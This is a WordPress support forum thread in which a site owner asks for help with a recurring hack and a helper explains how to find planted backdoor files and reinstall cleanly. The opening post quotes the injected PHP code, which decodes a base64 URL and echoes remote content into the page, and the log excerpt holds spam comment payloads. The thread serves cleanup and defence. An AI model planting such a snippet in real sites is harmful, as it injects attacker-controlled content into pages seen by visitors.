Hidden Link Hack, Cannot Figure Out

  • Resolved pgatroy

    (@pgatroy)


    16 years, 6 months ago

    I have been dealing with this for the past three weeks. I have read over 100 articles on how to fix this and still can’t figure anything out. I keep finding the following code in one of the following: header.php, index.php, and footer.php. I delete it but it always comes back. I have checked my files for the typical malicious files such as the bad image files, “wordpress” username, additional plugins in mysql database, etc. I can’t find anything. Any help would be greatly appreciated. Below is the code that keep getting injected. I have also changed all passwords such as server, ftp, wordpress, mysql, etc. There is a very good chance that I picked this up when I was still on WordPress 2.3.3.

    <?php
    $str1 = ‘aHR0cDovL2NkdC5vcmcvc2VhcmNoL3NlYXJjaGRhdGEvdGVtcGxhdGVzL3N0eWxlLmh0bQ==’;
    $content=file_get_contents(base64_decode($str1),FALSE);
    echo $content; ?>

    Thank you for your help.

Viewing 13 replies - 1 through 13 (of 13 total)

  • wp-includes/functions.php

    i should also point out that if that code is in your functions.php, removing it wont do anything, not long term at least. Theres undoubtedly files on your server that can be called through a browser, that will cause that code to be put back — it may be inside your wp-includes/tinmcy directory (thats where its been seen at least 2x prior).

    Thread Starter pgatroy

    (@pgatroy)

    whooami:

    Thanks so much for your reply. Can you tell me what I would be looking for in these files/folders. I scannned the functions.php file and nothing looks out of the ordinary.

    Thanks so much for your support.

    dont ‘scan’ ..

    2 things to make things easier —

    use an ftp client, and look at the timestamps on the files. any files that have different timestamps than the rest, and arent ones you recognize editing, ought to be scrutinized.

    second thing when you’re checking any files, I really recommend using beyond compare — its windows software that allows you to compare the content of any 2 files and will highlight the differences for you. It can be downloaded from https://www.scootersoftware.com/

    Grab a fresh copy of whatever version of wp youre using, and have at it ??

    Thread Starter pgatroy

    (@pgatroy)

    whooami,

    Thanks again for your help. I did exactly what you said with the above mentioned software and compared absolutely every single file/folder in the system. Everything was fine. Do you think that there is a chance this could be done through one of my many plugins that I have installed? All of my plugins are up to date.

    I am at the end of my rope and I am about ready to let go. I have spent so much time trying to figure this out and it is making me nuts!

    Thanks again for your suggestions. Any more are much appreciated. By the way, whoever comes up with a solution that works, there will be a monetary reward.

    Thanks again.

    Thread Starter pgatroy

    (@pgatroy)

    woo:

    Just installed your logger plugin. I will post after next hack. Thanks again.

    Thread Starter pgatroy

    (@pgatroy)

    I don’t think this tells me anything. I had the same injection indicated above placed into my footer this time. Here are the results during that timeframe from the logfile.

    author = play free online poker
    email = [email protected]
    url =
    comment = Lovely to see such a wonderful site. Thank you
    submit = Submit Comment
    comment_post_ID = 246
    193.227.1.25
    /wp-comments-post.php
    June 4, 2008, 9:17 am
    ————–**********——————

    wpcf_stage = process
    wpcf_your_name = Neophytos
    wpcf_email = [email protected]
    wpcf_response = None
    wpcf_website = https://relphiawhitehead.977mb.com/free55.html
    wpcf_usersubject = Submit Golf Related News
    wpcf_msg = Your site has very much liked me. I shall necessarily tell about him to the friends.
    free free
    [url=https://markarizmendi.seitenclique.net/free3098.html] free [/url] [url=https://markarizmendi.seitenclique.net/free4178.html] free [/url] [url=https://nancysamuel.yourfreehosting.net/free6909.html] free [/url] [url=https://jonathanmccracken.678host.com/free11.html] free [/url] [url=https://joshuanevitt.1122mb.com/free2963.html] free [/url]
    Submit = Submit
    201.254.56.16
    /index.php
    June 4, 2008, 9:19 am
    ————–**********——————

    it may not, the plugin captures $_POST requests, its not a magic wand.. The last hacked site I cleaned up was actually called using a simple $_GET. Besides, it’s intended to be used in combination with your Apache logs, which show $GETS

    Even looking at $_POST and $_GET requests may not be enough. Once someone has the sort of access that allows them to modify a WP file, its possible to code an exploit that triggers when you add a post.

    If you are still seeing injections, than you didnt go through the files well enough, or you missed some. WP consists of apprx 500 files, after all. And seriously, you ought to be replacing ALL files irrespective of not finding anything, except for wp-config.php

    Thread Starter pgatroy

    (@pgatroy)

    Thanks Whoo. Wouldn’t the files have been replaced when I used automatic upgrade from 2.3.3 to 2.5.1?

    Thank you.

    The plugin that does the automatic upgrade?

    Unless something is changed in the way that plugin works, it does NOT replace files that might have been placed on your site previously. Thats why I suggested paying very close attn. to the tinymc directory —

    As an example, the most recent hacked site I describe on my site, had files here:

    wp-includes/js/tinymce/themes/advanced/images/xp

    The files had been placed there prior the upgrade. The site was upgraded, using a plugin to do the upgrade, but one simple call to a file within that directory wrote the hacks back into the core WP files that had just been replaced.

    This goes the heart of the pitfalls of letting something else do what it is so very simple and ideally ought to be done by the user.

    And by the way, the call to the main exploit file, was a $GET_ — the night after this site was ‘cleaned’ the exploiter came back and attempted to rerun the script and all the different attempts and probes were seen in the site’s Apache logs.

    Thread Starter pgatroy

    (@pgatroy)

    Whoo,

    Thanks so much for your help and insight. What a pain in the A$$!!! I have learned my lesson to upgrade to the new versions as soon as they come out. I am going to do a complete fresh install, change my passwords and I will see what happens. When doing a clean install, I am assuming that I need to delete the wp-admin, wp-includes completely and then keep the config file, themes, uploads, etc. From what you say above, I need to delete as much as possible from what I have on the server.

    Any help on this would be greatly appreciated as well. Again, thanks so much for your help.

    Thread Starter pgatroy

    (@pgatroy)

    Just wanted to let those of you know who are having problems with this that I did a fresh install of wordpress (deleting as much as possible in regards to wp-folders and files and then re-uploading current version). So far, 12 hours later, still good to go. I am keeping my fingers crossed.

    I would even shitcan the theme files, if you can get away with it — download fresh copies, and put those up.

    The end goal is to make sure that all the files are clean, and since its a tedious task (for most) to look through all the files, deleting and replacing as many as you possibly can simplifies that process.

    Ideally, you ought to only have to physically scrutinize your wp-config.php and any server related files,(.htaccess).

    Its never a sure thing, but its very good advice.

Viewing 13 replies - 1 through 13 (of 13 total)
  • The topic ‘Hidden Link Hack, Cannot Figure Out’ is closed to new replies.